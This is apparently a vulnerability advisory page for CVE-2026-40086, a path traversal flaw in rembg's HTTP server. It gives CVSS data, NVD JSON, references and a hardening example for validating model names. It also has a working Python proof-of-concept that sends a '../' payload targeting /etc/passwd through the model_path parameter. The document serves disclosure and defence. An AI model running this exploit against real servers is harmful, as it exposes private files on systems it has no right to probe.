Security Vulnerability Report
CVE-2026-40086 CVSS 5.3 MEDIUM

Published: 2026-04-10 17:17:13
Last Modified: 2026-04-23 15:08:23

Description

Rembg is a tool to remove image backgrounds. Prior to 2.0.75, a path traversal vulnerability in the rembg HTTP server allows unauthenticated remote attackers to read arbitrary files from the server's filesystem. By sending a crafted request with a malicious model_path parameter, an attacker can force the server to attempt loading any file as an ONNX model, revealing file existence, permissions, and potentially file contents through error messages. This vulnerability is fixed in 2.0.75.
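The control the description implies is that a client-supplied model_path must never be used as a filesystem path. The block below is an added example, not rembg's code and not its fix: a hypothetical resolve_model_path that accepts only a bare .onnx file name, resolves it under a fixed models directory, and rejects anything that escapes that directory, shown next to the unsafe pattern for contrast. The models directory is a constructed temporary directory with a placeholder file, so the block runs offline.

```python
import os
import tempfile
from pathlib import Path

# Constructed models directory for this demo; a real server would configure
# this once at startup. Resolved so symlinked temp dirs compare correctly.
MODELS_DIR = Path(tempfile.mkdtemp(prefix="models-")).resolve()
(MODELS_DIR / "u2net.onnx").write_bytes(b"constructed placeholder, not a real ONNX model")

ALLOWED_SUFFIX = ".onnx"


def unsafe_model_path(user_value: str) -> Path:
    """Vulnerable pattern: the client value is joined onto the models directory
    as-is, so a value built from '../' segments resolves outside it."""
    return (MODELS_DIR / user_value).resolve()


def resolve_model_path(user_value: str) -> Path:
    """Hardened pattern (hypothetical, not rembg's implementation):
    - accept only a bare file name (no separators, no parent components),
    - require the .onnx suffix,
    - resolve under MODELS_DIR and confirm the result is still inside it,
    - require the file to already exist, so arbitrary paths are never probed."""
    if not user_value or "/" in user_value or "\\" in user_value:
        raise ValueError("model name must not contain path separators")
    if user_value != os.path.basename(user_value) or user_value.startswith("."):
        raise ValueError("relative or hidden model names are not allowed")
    if not user_value.endswith(ALLOWED_SUFFIX):
        raise ValueError("model name must end with .onnx")
    candidate = (MODELS_DIR / user_value).resolve()
    # Containment check on the resolved path: defends against anything the
    # string checks above did not anticipate (e.g. a symlink in MODELS_DIR).
    if MODELS_DIR not in candidate.parents:
        raise ValueError("model path escapes the models directory")
    if not candidate.is_file():
        raise FileNotFoundError("unknown model")
    return candidate


def is_model_request_allowed(user_value: str) -> bool:
    """Boolean wrapper a request handler could call before loading any model."""
    try:
        resolve_model_path(user_value)
        return True
    except (ValueError, FileNotFoundError):
        return False


if __name__ == "__main__":
    for name in ["u2net.onnx", "../../../../../../etc/passwd", "..", "missing.onnx"]:
        print(f"{name!r}: allowed={is_model_request_allowed(name)}")
```

Note that the existence check sits after the containment check, so an error path never reports whether a file outside the models directory exists, which is the information leak the advisory describes.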

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:danielgatis:rembg:*:*:*:*:*:*:*:* - VULNERABLE
Rembg < 2.0.75

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit_rembg(target_url):
    """
    PoC for CVE-2026-40086
    Attempts to read a file using path traversal via model_path.
    """
    # The endpoint might vary depending on server configuration
    endpoint = f"{target_url}/remove"

    # Path traversal payload to read /etc/passwd (Linux) or win.ini (Windows)
    # Adjust the number of '../' based on the deployment depth
    payload = {"model_path": "../../../../../../etc/passwd"}

    try:
        response = requests.post(endpoint, data=payload)
        # The error message often reveals the file content or existence
        if response.status_code == 200 or response.status_code == 500:
            print("[+] Request sent successfully.")
            print("[+] Response (Check for file content/errors):")
            print(response.text[:500])
    except Exception as e:
        print(f"[-] Error during request: {e}")


if __name__ == "__main__":
    target = "http://localhost:5000"  # Replace with actual target
    exploit_rembg(target)
```

References

https://github.com/danielgatis/rembg/commit/7c76d3cdc5757ffbda6a76664b24cfbecdb80273 (Patch)
https://github.com/danielgatis/rembg/releases/tag/v2.0.75 (Product, Release Notes)
https://github.com/danielgatis/rembg/security/advisories/GHSA-3wqj-33cg-xc48 (Exploit, Mitigation, Vendor Advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-40086", "sourceIdentifier": "[email protected]", "published": "2026-04-10T17:17:12.663", "lastModified": "2026-04-23T15:08:22.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rembg is a tool to remove images background. Prior to 2.0.75, a path traversal vulnerability in the rembg HTTP server allows unauthenticated remote attackers to read arbitrary files from the server's filesystem. By sending a crafted request with a malicious model_path parameter, an attacker can force the server to attempt loading any file as an ONNX model, revealing file existence, permissions, and potentially file contents through error messages. This vulnerability is fixed in 2.0.75."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-73"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:danielgatis:rembg:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.0.75", "matchCriteriaId": "E4344D3C-49F0-4B6F-94B4-7AEBDAA57C60"}]}]}], "references": [{"url": "https://github.com/danielgatis/rembg/commit/7c76d3cdc5757ffbda6a76664b24cfbecdb80273", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/danielgatis/rembg/releases/tag/v2.0.75", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/danielgatis/rembg/security/advisories/GHSA-3wqj-33cg-xc48", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}
```